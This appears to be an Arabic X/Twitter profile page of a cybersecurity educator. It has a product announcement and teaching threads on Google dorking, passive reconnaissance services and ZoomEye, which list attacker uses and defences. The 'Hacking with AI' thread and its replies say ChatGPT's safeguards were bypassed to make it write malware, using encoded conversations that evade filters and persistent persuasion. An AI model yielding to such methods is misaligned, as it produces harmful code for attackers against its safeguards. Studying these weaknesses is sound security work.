ENG.NAIF ALSHEHRI 🇸🇦

@IT676

I teach people best practices in Software Engineering, Backend Engineering, Software Development, #CyberSec, and Code Review. I run @VisionAcademy00

Riyadh-Saudi Arabia

Joined December 2012

6 Following

8.2K Followers

10.8K Posts

Pinned Tweet

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

7 months ago

نعلن — بكل فخر — عن إطلاق منظومتين سعوديتين ١٠٠٪ تجسدان طموح التحول الرقمي وتدعمان مستهدفات رؤية المملكة العربية السعودية 2030. Metaletheia للمؤسسات، وMetaletheia Regulator Platform للجهات التنظيمية. برمجيات صُممت وطُورت بأيدٍ وطنية لتضع المملكة في مصاف الدول الرائدة في تقنيات حوكمة البيانات والامتثال. **Metaletheia (للمؤسسات):** منصة حوكمة بيانات وامتثال متكاملة تساعد الجهات على مواءمة متطلبات SDAIA وSAMA والجهات التنظيمية الأخرى ونظام حماية البيانات الشخصية PDPL عبر قدرات عملية تشمل: الاكتشاف التلقائي للبيانات وبناء كتالوج شامل، كشف الذكاء الاصطناعي لبيانات التعريف الشخصية PII (مثل الهوية الوطنية والإقامة والجواز)، إدارة جودة البيانات، التصنيف وفق مستويات SDAIA (سري للغاية، سري، مقيد، عام)، والتقارير التنظيمية الآلية الجاهزة للتدقيق. **Metaletheia Regulator Platform (للجهات التنظيمية):** منصة رقابية مركزية تمكن الجهات (مثل SDAIA وSAMA والجهات التنظيمية الأخرى) من استلام تقارير الامتثال الموحدة من مئات الجهات، تحليل مؤشرات الالتزام، رصد الانتهاكات تلقائيًا بحسب الشدة، وإدارة التنبيهات والملاحظات مع قنوات تواصل ثنائية الاتجاه تحفظ الأدلة وسجلات كاملة للإجراءات. توفر لوحات متابعة شاملة، مقارنة قطاعية، وتتبع لحالة المعالجات حتى الإغلاق. **تكامل وموثوقية على مستوى وطني** تعمل المنصتان بتناغم عبر طبقة مراسلة آمنة تمكن المؤسسات من إرسال تقارير الامتثال آليًا واستقبال تنبيهات وملاحظات الجهة التنظيمية لحظيًا — مع عزل كامل بين الشبكات، وتأكيدات تسليم، وسجل تدقيق يلبي متطلبات التفتيش. هذا التكامل يختصر الجهود اليدوية، يرفع نضج الحوكمة، ويعزز ثقة صناع القرار بالبيانات. وانطلاقًا من توجهنا لتوسيع أثر الحلول الوطنية وتمكين انتشارها إقليميًا وعالميًا، نعلن رغبتنا في استقبال عروض وطلبات الاستحواذ على المنظومتين من قبل الجهات الحكومية أو الشركات. **للتواصل:** الإيميل: [email protected] #التحول_الرقمي #رؤية_2030 #حوكمة_البيانات #حماية_البيانات #الامتثال #SDAIA #SAMA #PDPL #صناعة_سعودية #تقنية_سعودية #MadeInKSA @SDAIA_SA @SAMA_GOV @elm @humain @PIFSaudi @SCAI_AI @Deloitte @Mozn_ai

IT676's tweet photo. نعلن — بكل فخر — عن إطلاق منظومتين سعوديتين ١٠٠٪ تجسدان طموح التحول الرقمي وتدعمان مستهدفات رؤية المملكة العربية السعودية 2030.

Metaletheia للمؤسسات، وMetaletheia Regulator Platform للجهات التنظيمية. برمجيات صُممت وطُورت بأيدٍ وطنية لتضع المملكة في مصاف الدول الرائدة في تقنيات حوكمة البيانات والامتثال.

**Metaletheia (للمؤسسات):**
منصة حوكمة بيانات وامتثال متكاملة تساعد الجهات على مواءمة متطلبات SDAIA وSAMA والجهات التنظيمية الأخرى ونظام حماية البيانات الشخصية PDPL عبر قدرات عملية تشمل: الاكتشاف التلقائي للبيانات وبناء كتالوج شامل، كشف الذكاء الاصطناعي لبيانات التعريف الشخصية PII (مثل الهوية الوطنية والإقامة والجواز)، إدارة جودة البيانات، التصنيف وفق مستويات SDAIA (سري للغاية، سري، مقيد، عام)، والتقارير التنظيمية الآلية الجاهزة للتدقيق.

**Metaletheia Regulator Platform (للجهات التنظيمية):**
منصة رقابية مركزية تمكن الجهات (مثل SDAIA وSAMA والجهات التنظيمية الأخرى) من استلام تقارير الامتثال الموحدة من مئات الجهات، تحليل مؤشرات الالتزام، رصد الانتهاكات تلقائيًا بحسب الشدة، وإدارة التنبيهات والملاحظات مع قنوات تواصل ثنائية الاتجاه تحفظ الأدلة وسجلات كاملة للإجراءات. توفر لوحات متابعة شاملة، مقارنة قطاعية، وتتبع لحالة المعالجات حتى الإغلاق.

**تكامل وموثوقية على مستوى وطني**
تعمل المنصتان بتناغم عبر طبقة مراسلة آمنة تمكن المؤسسات من إرسال تقارير الامتثال آليًا واستقبال تنبيهات وملاحظات الجهة التنظيمية لحظيًا — مع عزل كامل بين الشبكات، وتأكيدات تسليم، وسجل تدقيق يلبي متطلبات التفتيش. هذا التكامل يختصر الجهود اليدوية، يرفع نضج الحوكمة، ويعزز ثقة صناع القرار بالبيانات.

وانطلاقًا من توجهنا لتوسيع أثر الحلول الوطنية وتمكين انتشارها إقليميًا وعالميًا، نعلن رغبتنا في استقبال عروض وطلبات الاستحواذ على المنظومتين من قبل الجهات الحكومية أو الشركات.

**للتواصل:**
الإيميل: info@sdc-ksa.com

#التحول_الرقمي #رؤية_2030 #حوكمة_البيانات #حماية_البيانات #الامتثال #SDAIA #SAMA #PDPL #صناعة_سعودية #تقنية_سعودية #MadeInKSA
@SDAIA_SA @SAMA_GOV @elm @humain @PIFSaudi @SCAI_AI @Deloitte @Mozn_ai

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

7 months ago

Live demo for both platforms.

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

7 months ago

نعلن — بكل فخر — عن إطلاق منظومتين سعوديتين ١٠٠٪ تجسدان طموح التحول الرقمي وتدعم مستهدفات رؤية المملكة العربية السعودية 2030 Metaletheia للمؤسسات، وMetaletheia Regulator Platform للجهات التنظيمية. برمجيات صممت وطورت بأيدٍ وطنية لتضع المملكة في مصاف الدول الرائدة في تقنيات حوكمة البيانات والامتثال. Metaletheia (للمؤسسات): منصة حوكمة بيانات وامتثال متكاملة تساعد الجهات على مواءمة متطلبات SDAIA وSAMA والجهات التنظيمية الأخرى ونظام حماية البيانات الشخصية PDPL عبر قدرات عملية تشمل : الاكتشاف التلقائي للبيانات وبناء كتالوج شامل ، كشف الذكاء الاصطناعي لبيانات التعريف الشخصية PII (مثل الهوية الوطنية والإقامة والجواز)، إدارة جودة البيانات، التصنيف وفق مستويات SDAIA (سري للغاية، سري، مقيد، عام)، والتقارير التنظيمية الآلية الجاهزة للتدقيق. Metaletheia Regulator Platform (للجهات التنظيمية): منصة رقابية مركزية تمكن الجهات (مثل SDAIA وSAMA والجهات التنظيمية الأخرى) من استلام تقارير الامتثال الموحدة من مئات الجهات، تحليل مؤشرات الالتزام، رصد الانتهاكات تلقائيا بحسب الشدة، وإدارة التنبيهات والملاحظات مع قنوات تواصل ثنائية الاتجاه تحفظ الأدلة وسجلات كاملة للإجراءات. توفر لوحات متابعة شاملة، مقارنة قطاعية، وتتبع لحالة المعالجات حتى الإغلاق. تكامل وموثوقية على مستوى وطني تعمل المنصتان بتناغم عبر طبقة مراسلة آمنة تمكن المؤسسات من إرسال تقارير الامتثال آليًا واستقبال تنبيهات وملاحظات الجهة التنظيمية لحظيًا — مع عزل كامل بين الشبكات، وتأكيدات تسليم، وسجل تدقيق يلبي متطلبات التفتيش. هذا التكامل يختصر الجهود اليدوية، يرفع نضج الحوكمة، ويعزز ثقة صناع القرار بالبيانات. وانطلاقا من توجهنا لتوسيع أثر الحلول الوطنية وتمكين انتشارها إقليميا وعالميا نعلن رغبتنا في استقبال عروض وطلبات الاستحواذ على المنظومتين من قبل الجهات الحكومية أو الشركات للتواصل : الإيميل : [email protected] #التحول_الرقمي #رؤية_2030 #حوكمة_البيانات #حماية_البيانات #الامتثال #SDAIA #SAMA #PDPL #صناعة_سعودية #تقنية_سعودية #MadeInKSA @SDAIA_SA @SAMA_GOV @elm @humain @PIFSaudi @SCAI_AI @Deloitte @Mozn_ai

IT676's tweet photo. نعلن — بكل فخر — عن إطلاق منظومتين سعوديتين ١٠٠٪ تجسدان طموح التحول الرقمي وتدعم مستهدفات رؤية المملكة العربية السعودية 2030

Metaletheia للمؤسسات، وMetaletheia Regulator Platform للجهات التنظيمية. برمجيات صممت وطورت بأيدٍ وطنية لتضع المملكة في مصاف الدول الرائدة في تقنيات حوكمة البيانات والامتثال.

Metaletheia (للمؤسسات):
منصة حوكمة بيانات وامتثال متكاملة تساعد الجهات على مواءمة متطلبات SDAIA وSAMA والجهات التنظيمية الأخرى ونظام حماية البيانات الشخصية PDPL عبر قدرات عملية تشمل : الاكتشاف التلقائي للبيانات وبناء كتالوج شامل ، كشف الذكاء الاصطناعي لبيانات التعريف الشخصية PII (مثل الهوية الوطنية والإقامة والجواز)، إدارة جودة البيانات، التصنيف وفق مستويات SDAIA (سري للغاية، سري، مقيد، عام)، والتقارير التنظيمية الآلية الجاهزة للتدقيق.

Metaletheia Regulator Platform (للجهات التنظيمية):
منصة رقابية مركزية تمكن الجهات (مثل SDAIA وSAMA والجهات التنظيمية الأخرى) من استلام تقارير الامتثال الموحدة من مئات الجهات، تحليل مؤشرات الالتزام، رصد الانتهاكات تلقائيا بحسب الشدة، وإدارة التنبيهات والملاحظات مع قنوات تواصل ثنائية الاتجاه تحفظ الأدلة وسجلات كاملة للإجراءات. توفر لوحات متابعة شاملة، مقارنة قطاعية، وتتبع لحالة المعالجات حتى الإغلاق.

تكامل وموثوقية على مستوى وطني
تعمل المنصتان بتناغم عبر طبقة مراسلة آمنة تمكن المؤسسات من إرسال تقارير الامتثال آليًا واستقبال تنبيهات وملاحظات الجهة التنظيمية لحظيًا — مع عزل كامل بين الشبكات، وتأكيدات تسليم، وسجل تدقيق يلبي متطلبات التفتيش. هذا التكامل يختصر الجهود اليدوية، يرفع نضج الحوكمة، ويعزز ثقة صناع القرار بالبيانات.

وانطلاقا من توجهنا لتوسيع أثر الحلول الوطنية وتمكين انتشارها إقليميا وعالميا نعلن رغبتنا
في استقبال عروض وطلبات الاستحواذ على المنظومتين من قبل الجهات الحكومية أو الشركات

للتواصل :
الإيميل : info@sdc-ksa.com

#التحول_الرقمي #رؤية_2030 #حوكمة_البيانات #حماية_البيانات #الامتثال #SDAIA #SAMA #PDPL #صناعة_سعودية #تقنية_سعودية #MadeInKSA

@SDAIA_SA
@SAMA_GOV
@elm
@humain
@PIFSaudi
@SCAI_AI
@Deloitte
@Mozn_ai

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

about 2 years ago

التجاوز من خلال المحادثات و أسلوب الإقناع و الإلحاح.

Who to follow

عبدالرحمن الداعج - تقني سيبراني

@A9_4

أبسط لك التقنية، وأحب التحفيز والمساعدة. متحدث ومدرب معتمد | مستشار وقائد للأمن السيبراني في @Microsoft وسابقا في @IBM و @Cisco ، بكالوريوس سايبر و MBA

مجتمع المصممين العرب

@ArabianDes

كل شي حول التصميم والأدوات المساعدة لكل مصمم، نرحب بجميع المشاركات. #UX, #UI, #Design, #userResearch, #usability, #prototyping

Fouad Almalki | فؤاد المالكي 🇸🇦

@engineer_fouad

Java SE/FX/EE Full Stack Developer.

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

about 2 years ago

#الامن_السيبراني #الذكاء_الاصطناعي اخلاء مسؤولية: كل ما سيعرض هنا فهو لأغراض تعليمية و البحث في مجال الأمن السيبراني، فقط. 🏴‍☠️❗️الاختراق باستخدام الذكاء الاصطناعي. Hacking with AI 🔺الذكاء الاصطناعي يمثل ثورة تكنولوجية هائلة في العديد من المجالات ومنها الأمن السيبراني من ناحية البحث والتحليل، لكنه يثير أيضًا تساؤلات حول الأمان والخصوصية. 🔺 في حين تم تصميم هذه الأنظمة للعمل ضمن معايير أمان محددة والتزام بقيود صارمة، فإن القلق من إمكانية اختراق هذه القيود موجود دائمًا. 🔺 تشكل الأمان والحماية في عالم الذكاء الاصطناعي تحديًا مستمرًا، خصوصًا مع تقدم التقنيات القادرة على تجاوز الحمايات القائمة. ✅ في هذا الثريد سأقوم باستعراض تجربتي البسيطة مع شات جي بي تي عند البحث لتحليل مدى أمان حلول الذكاء الاصطناعي. في هذه التجربة سنرى كيف تم تجاوز قيود الحماية الخاصة به و اجباره على كتابة برمجيات خبيثة وتحليل أنظمة معينة للحصول على الثغرات. 🔺 يوجد العديد من طرق اختراق قيود الذكاء الاصطناعي من أشهرها التواصل بالمحادثة من خلال تشفير معين، بحيث تكون المحادثة مشفره بأحد خوارزميات التشفير التي لا تستطيع الفلاتر كشفها أو تطوير طريقة جديدة للشتفير خاصة بكم في المحادثة. 🔺 أحد الطرق الشائعة الاخرى هي الاقناع والإلحاح للخروج عن القيود وفكها. 🚨 عملية اختراق الذكاء الاصطناعي يشكل خطر مهم بكافة المجالات وليس فقط مجال الأمن السيبراني. ✅ يتم تطوير أمان حلول الذكاء الاصطناعي بشكل مستمر لمنع مثل هذه الممارسات والوصول الى مستوى أمان مقبول عند التعامل مع الذكاء الاصطناعي.

IT676's tweet photo. #الامن_السيبراني
#الذكاء_الاصطناعي
اخلاء مسؤولية: كل ما سيعرض هنا فهو لأغراض تعليمية و البحث في مجال الأمن السيبراني، فقط.

🏴‍☠️❗️الاختراق باستخدام الذكاء الاصطناعي.
Hacking with AI
🔺الذكاء الاصطناعي يمثل ثورة تكنولوجية هائلة في العديد من المجالات ومنها الأمن السيبراني من ناحية البحث والتحليل، لكنه يثير أيضًا تساؤلات حول الأمان والخصوصية.

🔺 في حين تم تصميم هذه الأنظمة للعمل ضمن معايير أمان محددة والتزام بقيود صارمة، فإن القلق من إمكانية اختراق هذه القيود موجود دائمًا.

🔺 تشكل الأمان والحماية في عالم الذكاء الاصطناعي تحديًا مستمرًا، خصوصًا مع تقدم التقنيات القادرة على تجاوز الحمايات القائمة.

✅ في هذا الثريد سأقوم باستعراض تجربتي البسيطة مع شات جي بي تي عند البحث لتحليل مدى أمان حلول الذكاء الاصطناعي.
في هذه التجربة سنرى كيف تم تجاوز قيود الحماية الخاصة به و اجباره على كتابة برمجيات خبيثة وتحليل أنظمة معينة للحصول على الثغرات.

🔺 يوجد العديد من طرق اختراق قيود الذكاء الاصطناعي من أشهرها التواصل بالمحادثة من خلال تشفير معين، بحيث تكون المحادثة مشفره بأحد خوارزميات التشفير التي لا تستطيع الفلاتر كشفها أو تطوير طريقة جديدة للشتفير خاصة بكم في المحادثة.

🔺 أحد الطرق الشائعة الاخرى هي الاقناع والإلحاح للخروج عن القيود وفكها.

🚨 عملية اختراق الذكاء الاصطناعي يشكل خطر مهم بكافة المجالات وليس فقط مجال الأمن السيبراني.

✅ يتم تطوير أمان حلول الذكاء الاصطناعي بشكل مستمر لمنع مثل هذه الممارسات والوصول الى مستوى أمان مقبول عند التعامل مع الذكاء الاصطناعي.

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

about 2 years ago

تجاوز الفلاتر باستخدام المحادثات المشفرة.

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

about 2 years ago

#الامن_السيبراني #اختبار_الاختراق 🔴 للتذكير: افشاء ونشر معلومات سرية خاصة بمؤسسة معينة و/أو أفراد تعد جريمة إلكترونية يحاسب عليها القانون. 🏴‍☠️ Google Hacking تعتبر أحد الأساليب و الأدوات لجمع المعلومات حول هدف معين بطريقة غير مباشرة 🕵🏻‍♂️ Passive Reconnaissance يقوم Google بتشغيل محرك البحث الأكثر استخدامًا على الإنترنت. Google Hacking ✅ ماهو قوقل هاكنق؟ يسمى أيضًا Google Dorking، هو أسلوب يستخدم للعثور على الثغرات الأمنية والمعلومات الحساسة التي يمكن الوصول إليها عبر الإنترنت. حيث أن Google يقوم بتصفح كل صفحة تقريبًا في كل موقع ويب، ويبني قاعدة بيانات ضخمة لكافة المعلومات التي يجمعها. باعتبارك مختبر اختراق أو هاكر ، قد توفر قاعدة بيانات Google معلومات قد تكون لا تقدر بثمن، بما في ذلك بيانات حساسة أو كلمات المرور حول الأهداف المحتملة. ✅كيف يعمل هذا الأسلوب؟ يتم تحقيق Google Hacking باستخدام استعلامات بحث Search Queries محددة على محركات البحث مثل Google وغيرها من المحركات الأخرى. تعمل هذه الاستعلامات، التي يشار إليها غالبًا باسم Google Dorks، على الاستفادة من خصائص وعمليات تشغيل البحث المتقدمة لتصفية المعلومات الدقيقة واسترجاعها. Syntax: operator:search_term Example: site:https://t.co/Mce7U8JZj9 بعض الأمثلة على قوقل دوركس: site: Usage: site:https://t.co/Mce7U8JZj9 الغرض: تضييق نتائج البحث على الموقع المحدد. intext: Usage: intext:"confidential document" الروابط التالية تحتوي على مراجع لهذه الدوركس. https://t.co/CvWTG97xI9 https://t.co/EPoDnGVz4S https://t.co/oPnmehuEwn https://t.co/tSFSkusrIQ https://t.co/Gw6yFsiTe3 https://t.co/Y91fKcRJW6 هذه أداة مساعدة لكتابة الكويريز https://t.co/UoLPMV1oWz

IT676's tweet photo. #الامن_السيبراني
#اختبار_الاختراق

🔴 للتذكير: افشاء ونشر معلومات سرية خاصة بمؤسسة معينة و/أو أفراد تعد جريمة إلكترونية يحاسب عليها القانون.

🏴‍☠️ Google Hacking
تعتبر أحد الأساليب و الأدوات لجمع المعلومات حول هدف معين بطريقة غير مباشرة
🕵🏻‍♂️ Passive Reconnaissance

يقوم Google بتشغيل محرك البحث الأكثر استخدامًا على الإنترنت.

Google Hacking
✅ ماهو قوقل هاكنق؟
يسمى أيضًا Google Dorking، هو أسلوب يستخدم للعثور على الثغرات الأمنية والمعلومات الحساسة التي يمكن الوصول إليها عبر الإنترنت.
حيث أن Google يقوم بتصفح كل صفحة تقريبًا في كل موقع ويب، ويبني قاعدة بيانات ضخمة لكافة المعلومات التي يجمعها.

باعتبارك مختبر اختراق أو هاكر ، قد توفر قاعدة بيانات Google معلومات قد تكون لا تقدر بثمن، بما في ذلك بيانات حساسة أو كلمات المرور حول الأهداف المحتملة.

✅كيف يعمل هذا الأسلوب؟
يتم تحقيق Google Hacking باستخدام استعلامات بحث Search Queries محددة على محركات البحث مثل Google وغيرها من المحركات الأخرى.

تعمل هذه الاستعلامات، التي يشار إليها غالبًا باسم Google Dorks، على الاستفادة من خصائص وعمليات تشغيل البحث المتقدمة لتصفية المعلومات الدقيقة واسترجاعها.

Syntax: operator:search_term
Example: site:https://t.co/Mce7U8JZj9

بعض الأمثلة على قوقل دوركس:
site:
Usage: site:https://t.co/Mce7U8JZj9
الغرض: تضييق نتائج البحث على الموقع المحدد.

intext:
Usage: intext:"confidential document"

الروابط التالية تحتوي على مراجع لهذه الدوركس.

https://t.co/CvWTG97xI9

https://t.co/EPoDnGVz4S

https://t.co/oPnmehuEwn

https://t.co/tSFSkusrIQ

https://t.co/Gw6yFsiTe3

https://t.co/Y91fKcRJW6

هذه أداة مساعدة لكتابة الكويريز
https://t.co/UoLPMV1oWz

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

over 2 years ago

#الامن_السيبراني #اختبار_الاختراق 🕵🏻‍♂️ Passive Reconnaissance Tools & Techniques. 🔺 هذا الثرد سيغطي بعض أشهر الأدوات والأساليب المستخدمة لجمع المعلومات حول الهدف بأسلوب مجهول ومن البيانات مفتوحة المصدر. 🔺كما رأينا سابًقا ، يقصد بالاستطلاع المجهول هو أن يقوم المهاجم أو مختبر الاختراق بجمع المعلومات دون التفاعل المباشر مع النظام المستهدف بهدف عدم تنبيه هذا النظام. 🔺يوجد العديد من المصادر مفتوحة المصدر والمتاحة لعامة الناس التي يمكن الاستعانه بها لجمع المعلومات حول هدف معين. 🔺فيما يلي قائمة ببعض الخدمات المتاحة مجانًا لجمع المعلومات حول أهداف معينة "موقع حاليًا" ✅ Netcraft 🔺عند فحص موقع معين عبر Netcraft ستحصل على تقرير مفصل خلال ثانية واحدة، يحتوي على الكثير من المعلومات كما هو موضح بالصور ولكن من أهمها : 📌 Server IP and Location 📌The operating system 📌The web server 📌Backend & Frontend Technologies 📌Content Management System 📌Last seen 📌etc.. 🔺رابط الخدمة ✅ https://t.co/zPROqxD8VT 🔺يوجد العديد من الخدمات والأدوات الأخرى المشابهه لمعرفة هذه المعلومات ، ولكن هنا نحن بمرحلة Passive Reconnaissance بالتالي جمع المعلومات يتم بدون تفاعل مباشر مع الهدف كاستخدام أدوات: nmap, Metasploit, Nikto, etc.. حيث أنها تتفاعل مع الهدف بشكل مباشر. 🔺ملاحظة: سنقوم باستخدام هذه الأدوات عندما البدء في مرحلة Active Reconnaissance. 🔺بالتالي قائمة ببعض الخدمات الجيدة المشابهه ل نت كرافت في توفير معلومات عن التقنيات والبرمجيات التي يستخدمها الهدف: ✅ https://t.co/Emd3yixs5y ✅ https://t.co/S50L6zD0ie ✅ https://t.co/HXGxM8Ar4l ✅ https://t.co/quhlIDM4qh ✅ https://t.co/sod1aB4ZGj ✅ https://t.co/nbFpYOPvOZ ✅ https://t.co/rVvWU5TA5n ✅ https://t.co/C8oiCP9tiu ✅ https://t.co/GUgd1Fp7ka ✅ https://t.co/EVX2asN1y0 ✅ https://t.co/R5xuUQrN3w 🔺كل هذه الخدمات مجانية وتعتبر مدخل جيد لجمع المعلومات الفنية حول الهدف. 🔺ملاحظة: تتوفر extension لبعض هذه الخدمات على المتصفحات كـ جوجل كروم و فايرفوكس.. 🔺يوجد بعض الأساليب المباشرة لمعرفة البيانات السابقة دون التفاعل مع الهدف ودون استخدام خدمات ،،سنستعرضها لاحقًا بشكل مفصل ولكن من الأمثلة عليها HTTP Headers الذي يمكن أن يعرض أحيانًا تفاصيل معلومات السرفر والتقنيات المستخدمة عليه من خلال المتصفح ودون الحاجة إلى أدوات خاصة كما هو موضح في الصور. 🔺في التغريدات القادمة سنستعرض بعض الخدمات الأخرى لجمع المعلومات دون التفاعل مع الهدف.

IT676's tweet photo. #الامن_السيبراني
#اختبار_الاختراق

🕵🏻‍♂️ Passive Reconnaissance Tools & Techniques.

🔺 هذا الثرد سيغطي بعض أشهر الأدوات والأساليب المستخدمة لجمع المعلومات حول الهدف بأسلوب مجهول ومن البيانات مفتوحة المصدر.

🔺كما رأينا سابًقا ، يقصد بالاستطلاع المجهول هو أن يقوم المهاجم أو مختبر الاختراق بجمع المعلومات دون التفاعل المباشر مع النظام المستهدف بهدف عدم تنبيه هذا النظام.

🔺يوجد العديد من المصادر مفتوحة المصدر والمتاحة لعامة الناس التي يمكن الاستعانه بها لجمع المعلومات حول هدف معين.

🔺فيما يلي قائمة ببعض الخدمات المتاحة مجانًا لجمع المعلومات حول أهداف معينة "موقع حاليًا"

✅ Netcraft
🔺عند فحص موقع معين عبر Netcraft ستحصل على تقرير مفصل خلال ثانية واحدة، يحتوي على الكثير من المعلومات كما هو موضح بالصور ولكن من أهمها :

📌 Server IP and Location
📌The operating system
📌The web server
📌Backend & Frontend Technologies
📌Content Management System
📌Last seen
📌etc..

🔺رابط الخدمة
✅ https://t.co/zPROqxD8VT

🔺يوجد العديد من الخدمات والأدوات الأخرى المشابهه لمعرفة هذه المعلومات ، ولكن هنا نحن بمرحلة Passive Reconnaissance بالتالي جمع المعلومات يتم بدون تفاعل مباشر مع الهدف كاستخدام أدوات:
nmap, Metasploit, Nikto, etc..
حيث أنها تتفاعل مع الهدف بشكل مباشر.

🔺ملاحظة: سنقوم باستخدام هذه الأدوات عندما البدء في مرحلة
Active Reconnaissance.

🔺بالتالي قائمة ببعض الخدمات الجيدة المشابهه ل نت كرافت في توفير معلومات عن التقنيات والبرمجيات التي يستخدمها الهدف:

✅ https://t.co/Emd3yixs5y

✅ https://t.co/S50L6zD0ie

✅ https://t.co/HXGxM8Ar4l

✅ https://t.co/quhlIDM4qh

✅ https://t.co/sod1aB4ZGj

✅ https://t.co/nbFpYOPvOZ

✅ https://t.co/rVvWU5TA5n

✅ https://t.co/C8oiCP9tiu

✅ https://t.co/GUgd1Fp7ka

✅ https://t.co/EVX2asN1y0

✅ https://t.co/R5xuUQrN3w

🔺كل هذه الخدمات مجانية وتعتبر مدخل جيد لجمع المعلومات الفنية حول الهدف.

🔺ملاحظة: تتوفر extension لبعض هذه الخدمات على المتصفحات كـ جوجل كروم و فايرفوكس..

🔺يوجد بعض الأساليب المباشرة لمعرفة البيانات السابقة دون التفاعل مع الهدف ودون استخدام خدمات ،،سنستعرضها لاحقًا بشكل مفصل ولكن من الأمثلة عليها HTTP Headers الذي يمكن أن يعرض أحيانًا تفاصيل معلومات السرفر والتقنيات المستخدمة عليه من خلال المتصفح ودون الحاجة إلى أدوات خاصة كما هو موضح في الصور.

🔺في التغريدات القادمة سنستعرض بعض الخدمات الأخرى لجمع المعلومات دون التفاعل مع الهدف.

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

over 2 years ago

#الامن_السيبراني #اختبار_الاختراق 🕵🏻‍♂️ Passive Reconnaissance Tools & Techniques. ZoomEye 🔺 يسمى بمحرك بحث الهاكرز. 🔺واحيانا محرك بحث مختصي الأمن. 🔺اذا مثلا كان فيه ثغره جديدة مكتشفة وكنا حابين نعرف كم تقريبًا عدد الأجهزه المتأثره؟ 🔺أو كنا حابين نحصل أجهزه مصابة بهذه الثغره ونبي نختبرها أو نجربها لكتابة بحث أمني أو تقرير؟ ✅ زوم آي يعتبر أحد الأدوات المناسبة لهذه الأغراض. 🔺 لنتعرف أكثر على ZoomEye 📌 ماهو ZoomEye؟ 🔺هو محرك بحث صيني تم تطويره من شركة KnownSec مصمم لاكتشاف ورسم خرائط وتحليل الأجهزة المتصلة بالإنترنت وخدمات الويب والبرمجيات واصداراتها. 🔺مشابه لمحركات البحث الأخرى مثل Shodan أو Censys، حيث يقوم ZoomEye بفهرسة المعلومات المتعلقة بالأجهزة المتصلة بالإنترنت، بما في ذلك خوادم الويب Web servers وأجهزة التوجيه routers وكاميرات الويب web cams وأجهزة IoT (إنترنت الأشياء) الأخرى. 🔺يقوم ZoomEye بجمع البيانات حول العديد من الخدمات ومعلومات الموقع الجغرافي وإصدارات البرامج وغيرها، مما يساعد المستخدمين على فهم ما هو متصل بالإنترنت ومما يتكون. 📌 لماذا زوم آي؟ Why? 🔺الغرض من ZoomEye والمحركات المشابهه هو تزويد الباحثين الأمنيين ومتخصصي الأمن السيبراني بأداة لمراقبة وتأمين شبكاتهم الخاصة، بالإضافة إلى إجراء أبحاث حول نقاط الضعف. فهو يسمح للمستخدمين برؤية شبكتهم كما يفعل الهاكر، وتحديد نقاط الضعف الأمنية المحتملة قبل أن يتم استغلالها في الهجمات السيبرانية Passive Reconnaissance 🔺الاستطلاع : يمكن للهاكرز ومختبري الاختراق استخدام ZoomEye لجمع معلومات حول الأهداف المحتملة، والعثور على الأجهزة أو الأنظمة التي قد تكون عرضة للهجوم بسبب البرامج القديمة، أو الاعدادات الخاطئة، أو نقاط الضعف المعروفة. ✅ أشهر بعض استخدامات الهاكرز لزوم آي: 🔺1. تحديد الأهداف والاستطلاع: يمكن للهاكرز استخدام ZoomEye لتحديد الأهداف المحتملة عن طريق البحث عن الأجهزة المتصلة بالإنترنت ولكنها غير آمنة أو تمت تهيئتها بشكل خاطئ. يمكن أن يشمل ذلك الأجهزة ذات المنافذ المفتوحة التي لا ينبغي كشفها، أو الأنظمة التي تشغل برامج قديمة معرضة للاستغلال، أو الأجهزة التي تستخدم بيانات افتراضية أو ضعيفة. ومن خلال تحديد هذه الأهداف، يمكن للهاكرز التخطيط لهجمات أكثر فعالية. 🔺2. استغلال الثغرات الأمنية المعروفة: بمجرد تحديد الأهداف المحتملة، يمكن للهاكرز استخدام المعلومات التي تم جمعها من ZoomEye لاستغلال نقاط الضعف المعروفة. على سبيل المثال، إذا كشف ZoomEye أن عنوان IP معين يقوم بتشغيل إصدار من خادم ويب web server معروف بأنه معرض للخطر، فيمكن للمتسلل استخدام هذه المعلومات لتنفيذ هجوم مصمم خصيصًا لتلك الثغرة الأمنية المحددة. "يعتبر من أشهر الاستخدامات التي يقوم بها الهاكرز العشوائيون لتنفيذ هجمات عشوائية حول منظمات "أو أفراد" عشوائية " 🔺3. بناء شبكات الروبوت Botnets: يمكن للهاكرز استخدام ZoomEye لاكتشاف أجهزة إنترنت الأشياء المعرضة للخطر، مثل الكاميرات الأمنية أو أجهزة الراوترز أو الأجهزة الذكية، والتي يمكن إصابتها وضمها إلى شبكة الروبوتات. يمكن بعد ذلك استخدام شبكات الروبوت هذه لأغراض ضارة مختلفة، بما في ذلك هجمات DDoS أو حملات البريد العشوائي وغيرها 🔺4. تجاوز الإجراءات الأمنية: قد يستخدم الهاكرز ZoomEye للعثور على مسارات غير مباشرة إلى الشبكة المستهدفة. على سبيل المثال، من خلال تحديد الأجهزة الأقل أمانًا والمتصلة بشبكات أكثر أمانًا، يمكن للهاكرز استغلال هذه الروابط الضعيفة لتجاوز الإجراءات الأمنية والحصول على وصول أعمق إلى الشبكة. 🔺5. جمع البيانات: من خلال تحديد قواعد البيانات أو أجهزة التخزين المكشوفة والوصول إليها من خلال ZoomEye، يمكن للهاكرز استخراج المعلومات الحساسة، والتي يمكن استخدامها لسرقة الهوية أو الاحتيال المالي أو التجسس على الشركات. 🔺6. المراقبة والتنصت: يمكن للهاكرز استخدام ZoomEye للتعرف على الكاميرات أو الميكروفونات أو الأجهزة الأخرى غير الآمنة والوصول إليها والتي يمكن استخدامها للتجسس على الأفراد أو المنظمات، أو جمع معلومات سرية أو شخصية دون موافقة. ✅ الاجراءات الدفاعية: ينبغي على المنظمات والأفراد: 🔺1. تدقيق ومراقبة الأجهزه والشبكات والمواقع التي تواجه الإنترنت بانتظام باستخدام أدوات مثل ZoomEye. 🔺2. تطبيق التصحيحات والتحديثات في الوقت المناسب على البرامج والأجهزة. 🔺3. تغيير كلمات المرور الافتراضية واستخدم حسابات دخول قوية وفريدة من نوعها. 🔺4. تنفيذ مبادئ تقسيم الشبكة وأقل الامتيازات لتقليل الأضرار المحتملة. 🔺5. تثقيف الموظفين حول مخاطر وعلامات التهديدات السيبرانية. ✅ يتوفر زوم آي كخدمة من خلال المتصفح 